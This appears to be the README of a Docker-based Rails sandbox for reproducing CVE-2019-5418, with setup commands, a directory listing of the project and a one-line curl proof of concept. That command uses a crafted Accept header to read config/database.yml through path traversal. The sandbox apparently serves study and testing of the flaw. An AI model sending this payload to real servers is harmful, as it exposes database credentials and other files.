# CVE-2019-5418 sandbox
[https://groups.google.com/forum/#!msg/rubyonrails-security/zRNVOUhKHrg/GmmcVXcmAAAJ](https://groups.google.com/forum/#!msg/rubyonrails-security/zRNVOUhKHrg/GmmcVXcmAAAJ)
### initialize
```
$ git clone https://github.com/takeokunn/CVE-2019-5418
$ cd https://github.com/takeokunn/CVE-2019-5418
$ docker-compose up
```
### Usage
```
$ curl localhost/sandbox -H 'Accept: ../../config/database.yml{{'
```
[4.0K] /data/pocs/c8cb8ebc5bf18233d0dc120c204b75e0aefe3725
├── [4.0K] app
│ ├── [4.0K] assets
│ │ ├── [4.0K] config
│ │ │ └── [ 101] manifest.js
│ │ ├── [4.0K] images
│ │ ├── [4.0K] javascripts
│ │ │ ├── [ 698] application.js
│ │ │ ├── [ 360] cable.js
│ │ │ └── [4.0K] channels
│ │ └── [4.0K] stylesheets
│ │ └── [ 709] application.css
│ ├── [4.0K] channels
│ │ └── [4.0K] application_cable
│ │ ├── [ 79] channel.rb
│ │ └── [ 85] connection.rb
│ ├── [4.0K] controllers
│ │ ├── [ 57] application_controller.rb
│ │ ├── [4.0K] concerns
│ │ └── [ 103] sandbox_controller.rb
│ ├── [4.0K] helpers
│ │ └── [ 29] application_helper.rb
│ ├── [4.0K] jobs
│ │ └── [ 43] application_job.rb
│ ├── [4.0K] mailers
│ │ └── [ 102] application_mailer.rb
│ ├── [4.0K] models
│ │ ├── [ 78] application_record.rb
│ │ └── [4.0K] concerns
│ └── [4.0K] views
│ └── [4.0K] layouts
│ ├── [ 276] application.html.erb
│ ├── [ 229] mailer.html.erb
│ └── [ 13] mailer.text.erb
├── [4.0K] bin
│ ├── [ 125] bundle
│ ├── [ 141] rails
│ ├── [ 90] rake
│ ├── [ 957] setup
│ ├── [ 819] update
│ └── [ 303] yarn
├── [4.0K] config
│ ├── [1.1K] application.rb
│ ├── [ 207] boot.rb
│ ├── [ 191] cable.yml
│ ├── [ 464] credentials.yml.enc
│ ├── [ 927] database.yml
│ ├── [ 128] environment.rb
│ ├── [4.0K] environments
│ │ ├── [2.1K] development.rb
│ │ ├── [3.8K] production.rb
│ │ └── [1.8K] test.rb
│ ├── [4.0K] initializers
│ │ ├── [ 216] application_controller_renderer.rb
│ │ ├── [ 630] assets.rb
│ │ ├── [ 404] backtrace_silencers.rb
│ │ ├── [1.1K] content_security_policy.rb
│ │ ├── [ 244] cookies_serializer.rb
│ │ ├── [ 194] filter_parameter_logging.rb
│ │ ├── [ 647] inflections.rb
│ │ ├── [ 156] mime_types.rb
│ │ └── [ 485] wrap_parameters.rb
│ ├── [4.0K] locales
│ │ └── [ 848] en.yml
│ ├── [1.4K] puma.rb
│ ├── [ 178] routes.rb
│ ├── [ 111] spring.rb
│ ├── [1.1K] storage.yml
│ └── [ 607] unicorn.rb
├── [ 130] config.ru
├── [4.0K] db
│ ├── [ 771] schema.rb
│ └── [ 370] seeds.rb
├── [4.0K] docker
│ ├── [4.0K] mysql
│ │ └── [4.0K] config
│ │ ├── [ 34] base.conf
│ │ └── [ 38] timezone.conf
│ ├── [4.0K] nginx
│ │ ├── [ 329] Dockerfile
│ │ ├── [ 731] nginx.conf
│ │ └── [ 537] rails.conf
│ └── [4.0K] web
│ └── [ 259] Dockerfile
├── [1.2K] docker-compose.yml
├── [ 0] dotenv.sample
├── [1.9K] Gemfile
├── [4.7K] Gemfile.lock
├── [4.0K] lib
│ ├── [4.0K] assets
│ └── [4.0K] tasks
├── [4.0K] log
├── [ 119] Makefile
├── [ 67] package.json
├── [ 68] Procfile.dev
├── [4.0K] public
│ ├── [1.7K] 404.html
│ ├── [1.7K] 422.html
│ ├── [1.6K] 500.html
│ ├── [ 0] apple-touch-icon.png
│ ├── [ 0] apple-touch-icon-precomposed.png
│ ├── [ 0] favicon.ico
│ └── [ 98] robots.txt
├── [ 227] Rakefile
├── [ 431] README.md
├── [4.0K] storage
└── [4.0K] tmp
36 directories, 70 files